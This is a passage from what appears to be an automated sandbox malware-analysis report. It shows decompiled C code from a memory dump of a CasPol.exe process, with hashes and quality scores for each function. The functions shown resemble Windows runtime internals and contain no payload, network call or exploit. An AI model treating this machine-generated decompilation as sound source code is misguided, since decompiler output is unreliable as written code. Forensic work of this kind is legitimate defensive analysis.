                                                                                                                                                                                                                                                                                                												 *(_t104 - 0x28) = _t80;
                                                                                                                                                                                                                                                                                                												 *(_t104 - 0x24) = _t95;
                                                                                                                                                                                                                                                                                                												while(1) {
                                                                                                                                                                                                                                                                                                													L19:
                                                                                                                                                                                                                                                                                                													__eflags = _t95;
                                                                                                                                                                                                                                                                                                													if(_t95 == 0) {
                                                                                                                                                                                                                                                                                                														break;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t102 = _t80;
                                                                                                                                                                                                                                                                                                													 *(_t104 - 0x30) = _t95;
                                                                                                                                                                                                                                                                                                													 *(_t104 - 0x24) = _t95 - 1;
                                                                                                                                                                                                                                                                                                													asm("lock cmpxchg8b [edi]");
                                                                                                                                                                                                                                                                                                													_t80 = _t102;
                                                                                                                                                                                                                                                                                                													 *(_t104 - 0x28) = _t80;
                                                                                                                                                                                                                                                                                                													 *(_t104 - 0x24) = _t95;
                                                                                                                                                                                                                                                                                                													__eflags = _t80 - _t102;
                                                                                                                                                                                                                                                                                                													_t99 =  *(_t104 + 8);
                                                                                                                                                                                                                                                                                                													if(_t80 != _t102) {
                                                                                                                                                                                                                                                                                                														continue;
                                                                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                                                                														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                                                                                                                                                                                                                                														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                                                                                                                                                                                                                                															continue;
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															__eflags = _t95;
                                                                                                                                                                                                                                                                                                															if(_t95 != 0) {
                                                                                                                                                                                                                                                                                                																_t74 = 0;
                                                                                                                                                                                                                                                                                                																 *(_t104 - 0x34) = 0;
                                                                                                                                                                                                                                                                                                																_t102 = 0;
                                                                                                                                                                                                                                                                                                																__eflags = 0;
                                                                                                                                                                                                                                                                                                																while(1) {
                                                                                                                                                                                                                                                                                                																	 *(_t104 - 0x3c) = _t102;
                                                                                                                                                                                                                                                                                                																	__eflags = _t102 - 3;
                                                                                                                                                                                                                                                                                                																	if(_t102 >= 3) {
                                                                                                                                                                                                                                                                                                																		break;
                                                                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                                                                																	__eflags = _t74;
                                                                                                                                                                                                                                                                                                																	if(_t74 != 0) {
                                                                                                                                                                                                                                                                                                																		L49:
                                                                                                                                                                                                                                                                                                																		_t102 =  *_t74;
                                                                                                                                                                                                                                                                                                																		__eflags = _t102;
                                                                                                                                                                                                                                                                                                																		if(_t102 != 0) {
                                                                                                                                                                                                                                                                                                																			_t102 =  *(_t102 + 4);
                                                                                                                                                                                                                                                                                                																			__eflags = _t102;
                                                                                                                                                                                                                                                                                                																			if(_t102 != 0) {
                                                                                                                                                                                                                                                                                                																				 *0x181b1e0(_t74, _t99);
                                                                                                                                                                                                                                                                                                																				 *_t102();
                                                                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                                                                																		do {
                                                                                                                                                                                                                                                                                                																			_t71 = _t99 + 8;
                                                                                                                                                                                                                                                                                                																			 *(_t104 - 0x2c) = _t71;
                                                                                                                                                                                                                                                                                                																			_t80 =  *_t71;
                                                                                                                                                                                                                                                                                                																			_t95 = _t71[1];
                                                                                                                                                                                                                                                                                                																			 *(_t104 - 0x28) = _t80;
                                                                                                                                                                                                                                                                                                																			 *(_t104 - 0x24) = _t95;
                                                                                                                                                                                                                                                                                                																			goto L19;
                                                                                                                                                                                                                                                                                                																		} while (_t74 == 0);
                                                                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                                                                																		_t82 = 0;
                                                                                                                                                                                                                                                                                                																		__eflags = 0;
                                                                                                                                                                                                                                                                                                																		while(1) {
                                                                                                                                                                                                                                                                                                																			 *(_t104 - 0x38) = _t82;
                                                                                                                                                                                                                                                                                                																			__eflags = _t82 -  *0x18184c0;
                                                                                                                                                                                                                                                                                                																			if(_t82 >=  *0x18184c0) {
                                                                                                                                                                                                                                                                                                																				break;
                                                                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                                                                																			__eflags = _t74;
                                                                                                                                                                                                                                                                                                																			if(_t74 == 0) {
                                                                                                                                                                                                                                                                                                																				_t77 = E017F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                                                                                                                                                                                                                                																				__eflags = _t77;
                                                                                                                                                                                                                                                                                                																				if(_t77 == 0) {
                                                                                                                                                                                                                                                                                                																					_t74 = 0;
                                                                                                                                                                                                                                                                                                																					__eflags = 0;
                                                                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                                                                																					_t74 = _t77 + 0xfffffff4;
                                                                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                                                                																				 *(_t104 - 0x34) = _t74;
                                                                                                                                                                                                                                                                                                																				_t82 = _t82 + 1;
                                                                                                                                                                                                                                                                                                																				continue;
                                                                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                                                                																			break;
                                                                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                                                                																		_t102 = _t102 + 1;
                                                                                                                                                                                                                                                                                                																		continue;
                                                                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                                                                																	goto L20;
                                                                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                                                                																__eflags = _t74;
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													break;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                												L20:
                                                                                                                                                                                                                                                                                                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                                                                                                                                                                                                                                												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                                                                                                                                                                                                                                												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                                                                                                                                                                                                                                												goto L21;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										L21:
                                                                                                                                                                                                                                                                                                										 *(_t104 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                										E0172922A(_t99);
                                                                                                                                                                                                                                                                                                										_t64 = E01747D50();
                                                                                                                                                                                                                                                                                                										__eflags = _t64;
                                                                                                                                                                                                                                                                                                										if(_t64 != 0) {
                                                                                                                                                                                                                                                                                                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											_t67 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										__eflags =  *_t67;
                                                                                                                                                                                                                                                                                                										if( *_t67 != 0) {
                                                                                                                                                                                                                                                                                                											_t67 = E017F8B58(_t99);
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                                                                                                                                                                                                                                										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                                                                                                                                                                                                                                											__eflags = _t99 -  *0x18186c0; // 0x11607b0
                                                                                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                												__eflags = _t99 -  *0x18186b8; // 0x0
                                                                                                                                                                                                                                                                                                												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                													_t94 = 0x18186bc;
                                                                                                                                                                                                                                                                                                													_t87 = 0x18186b8;
                                                                                                                                                                                                                                                                                                													goto L27;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													__eflags = _t67 | 0xffffffff;
                                                                                                                                                                                                                                                                                                													asm("lock xadd [edi], eax");
                                                                                                                                                                                                                                                                                                													if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                														E01729240(_t80, _t99, _t99, _t102, __eflags);
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                                                                												_t94 = 0x18186c4;
                                                                                                                                                                                                                                                                                                												_t87 = 0x18186c0;
                                                                                                                                                                                                                                                                                                												L27:
                                                                                                                                                                                                                                                                                                												E01759B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										goto L13;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						return E0177D130(_t80, _t99, _t102);
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						 *_t51 = 0x1815388;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                                                                                                                                                                                                                                						 *_t84 = _t51;
                                                                                                                                                                                                                                                                                                						 *0x181538c = _t51;
                                                                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x0172919a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178371f
                                                                                                                                                                                                                                                                                                0x01783721
                                                                                                                                                                                                                                                                                                0x01783727
                                                                                                                                                                                                                                                                                                0x0178372f
                                                                                                                                                                                                                                                                                                0x01783733
                                                                                                                                                                                                                                                                                                0x01783735
                                                                                                                                                                                                                                                                                                0x01783738
                                                                                                                                                                                                                                                                                                0x0178373b
                                                                                                                                                                                                                                                                                                0x0178373d
                                                                                                                                                                                                                                                                                                0x01783740
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783746
                                                                                                                                                                                                                                                                                                0x01783746
                                                                                                                                                                                                                                                                                                0x01783749
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178374f
                                                                                                                                                                                                                                                                                                0x0178374f
                                                                                                                                                                                                                                                                                                0x01783751
                                                                                                                                                                                                                                                                                                0x01783757
                                                                                                                                                                                                                                                                                                0x01783759
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x01783761
                                                                                                                                                                                                                                                                                                0x01783764
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783766
                                                                                                                                                                                                                                                                                                0x01783768
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a3
                                                                                                                                                                                                                                                                                                0x017837a5
                                                                                                                                                                                                                                                                                                0x017837a7
                                                                                                                                                                                                                                                                                                0x017837ad
                                                                                                                                                                                                                                                                                                0x017837b0
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x017837bc
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376f
                                                                                                                                                                                                                                                                                                0x01783775
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783777
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x01783782
                                                                                                                                                                                                                                                                                                0x01783787
                                                                                                                                                                                                                                                                                                0x01783789
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x01783792
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783798

Memory Dump Source
• Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ac9cca396a35d4af95086352d441fc5d3fd63ee062eb56a482a9ad2ea173990
• Instruction ID: 588fe35c7610f68bad952f982ef08c47e7c14953e956bfb6d1005d96b1ad7071
• Opcode Fuzzy Hash: 9ac9cca396a35d4af95086352d441fc5d3fd63ee062eb56a482a9ad2ea173990
• Instruction Fuzzy Hash: F501F47350122A8FD3358F08D840B11FBA9EF83324F294166E701CB696C378DD42CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E017F4015(signed int __eax, signed int __ecx) {
	void* __ebx;
	void* __edi;
	signed char _t10;
	signed int _t28;

	_push(__ecx);
	_t28 = __ecx;
	asm("lock xadd [edi+0x24], eax");
	_t10 = (__eax | 0xffffffff) - 1;
	if(_t10 == 0) {
		_t1 = _t28 + 0x1c; // 0x1e
		E01742280(_t10, _t1);
		 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
		E01742280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18186ac);
		E0172F900(0x18186d4, _t28);
		L0173FFB0(0x18186ac, _t28, 0x18186ac);
		 *((intOrPtr*)(_t28 + 0x20)) = 0;
		L0173FFB0(0, _t28, _t1);
		_t18 =  *((intOrPtr*)(_t28 + 0x94));
		if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
			L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
		}
		_t10 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
	}
	return _t10;
}








                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a65c698f21de79bd718f2b84b5518466e551436890f38ce14408fb2901870cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 1500e476fe3c0174aa85afad1227953b57e8a64112163ab56e88b542dd06bb18
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a65c698f21de79bd718f2b84b5518466e551436890f38ce14408fb2901870cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4501A2726019467FD211AB79CD88E13F7ACFF95760B000629F608C3A26CB24EC11CAE4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E017E138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                				short _v54;
                                                                                                                                                                                                                                                                                                				char _v60;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed char* _t21;
                                                                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t32 = __edx;
                                                                                                                                                                                                                                                                                                				_t27 = __ebx;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t35;
                                                                                                                                                                                                                                                                                                				_t33 = __edx;
                                                                                                                                                                                                                                                                                                				_t34 = __ecx;
                                                                                                                                                                                                                                                                                                				E0176FA60( &_v60, 0, 0x30);
                                                                                                                                                                                                                                                                                                				_v20 = _a4;
                                                                                                                                                                                                                                                                                                				_v16 = _a8;
                                                                                                                                                                                                                                                                                                				_v28 = _t34;
                                                                                                                                                                                                                                                                                                				_v24 = _t33;
                                                                                                                                                                                                                                                                                                				_v54 = 0x1033;
                                                                                                                                                                                                                                                                                                				if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                					_t21 = 0x7ffe0388;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push( &_v60);
                                                                                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                                                                                				_push(0x20402);
                                                                                                                                                                                                                                                                                                				return L0176B640(E01769AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
                                                                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 89cd7df74606626d395c110998a6f1327fba793da09bb4022ad1e54df651f313
                                                                                                                                                                                                                                                                                                • Instruction ID: e7722a817805f185abf8047162a998ea7128ff0d082d66116cca11147e7d5544
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89cd7df74606626d395c110998a6f1327fba793da09bb4022ad1e54df651f313
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C015271A00319AFDB14DFA9D846FAEFBF8EF55710F404056F904EB280DA749A41CB94
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E017F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v11;
                                                                                                                                                                                                                                                                                                				unsigned int _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v15;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                                                                				unsigned int _t13;
                                                                                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                                                                                				signed int* _t35;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t22 = __ebx;
                                                                                                                                                                                                                                                                                                				_t35 = __ecx;
                                                                                                                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                                                                                                                				_t13 =  !( *__ecx) + 1;
                                                                                                                                                                                                                                                                                                				_v12 = _t13;
                                                                                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                					_push((_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                                                                                                                                                                                                                                					L017F165E(__ebx, 0x1818ae4, (__edx -  *0x1818b04 >> 0x14) + (__edx -  *0x1818b04 >> 0x14), __edi, __ecx, (__edx -  *0x1818b04 >> 0x14) + (__edx -  *0x1818b04 >> 0x14));
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push( *((intOrPtr*)(_t35 + 0x38)));
                                                                                                                                                                                                                                                                                                				_push( *((intOrPtr*)(_t35 + 0x34)));
                                                                                                                                                                                                                                                                                                				_push(0x8000);
                                                                                                                                                                                                                                                                                                				L017EAFDE( &_v8,  &_v12);
                                                                                                                                                                                                                                                                                                				if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                					_t16 = 0x7ffe0388;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if( *_t16 != 0) {
                                                                                                                                                                                                                                                                                                					_t16 = L017DFE3F(_t22, _t35, _v11, _v15);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t16;
                                                                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ff215d96625d70dbd67179192f4d08ecf74ff565e2ffb206872b8a5d81cd7b6c
                                                                                                                                                                                                                                                                                                • Instruction ID: ea8d062e610cd7b71aa78b18d29ecbcb6139dff0c028840125051dfcd14c0637
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff215d96625d70dbd67179192f4d08ecf74ff565e2ffb206872b8a5d81cd7b6c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A012872604746DBC710DF28C944B1BFBE9AB84310F44C529FA8583394DE30D541CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0173B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                                                                                                                                                                                                                                				signed char _t11;
                                                                                                                                                                                                                                                                                                				signed char* _t12;
                                                                                                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                				signed short* _t25;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t25 = __edx;
                                                                                                                                                                                                                                                                                                				_t24 = __ecx;
                                                                                                                                                                                                                                                                                                				_t11 = ( *[fs:0x30])[0x50];
                                                                                                                                                                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                                                                                                                                                                					if( *_t11 == 0) {
                                                                                                                                                                                                                                                                                                						goto L1;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                                                                					if( *_t12 != 0) {
                                                                                                                                                                                                                                                                                                						_t12 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                							_t12 = 0x7ffe0385;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(( *_t12 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						return E017A7016(_a4, _t24, 0, 0, _t25, 0);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                                                					return _t12;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L1:
                                                                                                                                                                                                                                                                                                				_t12 = 0x7ffe0384;
                                                                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                                                                                                                • Instruction ID: 953ba90b9c05cfa7a9b972ed2f45b0d18eacfd2b3b1a32bdee2845ab021bd94b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1018F723449809FE726971DC988F66FBD8EBC5754F0900A2FA19CBA56D728DC40C621
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                                			E017F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                				short _v66;
                                                                                                                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed char* _t18;
                                                                                                                                                                                                                                                                                                				signed int _t32;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t29 = __edx;
                                                                                                                                                                                                                                                                                                				_v12 =  *0x181d360 ^ _t32;
                                                                                                                                                                                                                                                                                                				_t31 = _a8;
                                                                                                                                                                                                                                                                                                				_t30 = _a12;
                                                                                                                                                                                                                                                                                                				_v66 = 0x1c20;
                                                                                                                                                                                                                                                                                                				_v40 = __ecx;
                                                                                                                                                                                                                                                                                                				_v36 = __edx;
                                                                                                                                                                                                                                                                                                				_v32 = _a4;
                                                                                                                                                                                                                                                                                                				_v28 = _a8;
                                                                                                                                                                                                                                                                                                				_v24 = _a12;
                                                                                                                                                                                                                                                                                                				if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                					_t18 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                				} else {
